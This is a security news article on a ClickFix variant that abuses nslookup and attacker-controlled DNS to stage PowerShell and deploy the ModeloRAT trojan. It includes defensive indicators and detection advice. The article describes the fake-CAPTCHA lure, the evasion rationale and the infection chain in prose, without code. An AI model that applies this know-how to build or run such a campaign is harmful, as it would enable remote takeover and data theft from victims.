ClickFix Attacks Now Abuse DNS to Evade Security Tools

ClickFix campaigns have evolved again. Microsoft disclosed a new variant that abuses DNS lookups to stage malware, blending malicious traffic with legitimate network activity and bypassing traditional detection methods.

The technique uses the Windows nslookup command to query attacker-controlled DNS servers, retrieving encoded PowerShell payloads that ultimately deploy ModeloRAT—a Python-based remote access trojan with full system access capabilities.

How the Attack Chain Works

Like earlier ClickFix variants, this campaign relies on social engineering rather than technical exploits. Victims encounter fake CAPTCHA or verification pages that instruct them to press specific key combinations: Windows Key + R to open the Run dialog, Ctrl + V to paste a pre-loaded command, then Enter to execute.

Microsoft's analysis reveals the new twist: instead of directly downloading malware via HTTP, the initial command executes an nslookup query against a hard-coded external DNS server—bypassing the system's default resolver entirely.

The DNS response contains the "Name:" field populated with an encoded payload. The command filters this output and executes it as the secondary stage, initiating a multi-step infection chain:

1. ZIP archive download from external server (azwsappdev[.]com)
2. Malicious Python script extraction and execution
3. Reconnaissance and discovery commands
4. VBScript deployment to launch ModeloRAT
5. Persistence via Windows Startup folder LNK file

Why DNS?

"Using DNS in this way reduces dependency on traditional web requests and can help blend malicious activity into normal network traffic," Microsoft noted.

DNS traffic is rarely blocked outright because it's essential for normal network operation. Security tools that inspect HTTP/HTTPS traffic may miss DNS-tunneled payloads entirely. And because the attackers control the external DNS server, they can dynamically update payloads without changing the initial infection command.

The shift also helps evade controls that block PowerShell and mshta executions—common defensive measures that attackers have noticed. By staging through DNS, the initial command appears as a simple network diagnostic rather than an obvious malware loader.

ModeloRAT Capabilities

The final payload, ModeloRAT, is a Python-based RAT with broad capabilities. Once installed, attackers can:

• Execute arbitrary commands on infected systems
• Access and exfiltrate files
• Control running processes
• Establish persistent access via Startup folder shortcuts

The RAT uses token-protected C2 communication, adding an authentication layer that complicates researcher analysis. We previously covered ModeloRAT deployment via malicious Chrome extensions targeting enterprise environments, demonstrating that multiple threat actors have adopted this malware family.

Connection to Broader ClickFix Campaigns

ClickFix has become one of the most adaptable social engineering frameworks in the current threat landscape. Earlier variants used Python-based cross-platform payloads targeting both Windows and macOS. The technique has been used to distribute everything from infostealers to ransomware precursors.

According to Malwarebytes, concurrent campaigns are also deploying Lumma Stealer through CastleLoader, an AutoIt-based malware loader distributed via similar fake CAPTCHA pages.

The constant evolution reflects a truth about modern malware distribution: technical sophistication often matters less than psychological manipulation. Users who would never open a suspicious email attachment will readily follow "verification" instructions on what appears to be a legitimate website.

Indicators of Compromise

Network indicators:

• DNS queries to external resolvers (not organization's configured DNS)
• Connections to azwsappdev[.]com
• Unusual DNS TXT record queries containing encoded data

Host indicators:

• LNK files in %APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup
• Python processes spawned from unexpected locations
• VBScript execution following PowerShell activity

Behavioral indicators:

• Users reporting requests to press Win+R during web browsing
• Clipboard manipulation (commands pasted without user typing)

Defensive Recommendations

For security teams:

1. Monitor for nslookup commands querying external DNS servers rather than internal resolvers
2. Inspect DNS traffic for anomalous TXT record requests containing suspicious data
3. Alert on PowerShell execution immediately following nslookup processes
4. Block execution of scripts from user-writable temp directories

For organizations:

Consider DNS filtering solutions that can inspect query content and block connections to known-malicious infrastructure. While this won't catch entirely novel campaigns, it reduces exposure to documented threats.

User education remains critical. Employees should understand that legitimate websites never ask them to execute commands via the Windows Run dialog. Any site requesting keyboard shortcuts beyond normal web interaction—especially Win+R sequences—should be treated as suspicious and reported.

For individuals:

If you encounter a verification page asking you to press Windows Key + R, close the browser immediately. Legitimate CAPTCHA systems use mouse clicks on images or simple checkboxes, not command-line execution. For guidance on recognizing social engineering tactics like these, training and awareness remain your best defense.

Why This Matters

ClickFix represents a broader shift toward low-tech, high-success attack methods. Technical vulnerability exploitation requires finding and weaponizing bugs. Social engineering requires only convincing someone to follow instructions.

The DNS abuse angle shows attackers actively circumventing defenses. Security teams block PowerShell downloads, so attackers move to DNS. Organizations restrict internet access, so attackers use protocols that can't be blocked without breaking legitimate operations.

Expect this adaptation cycle to continue. As long as ClickFix-style attacks remain effective, threat actors will keep refining the technique.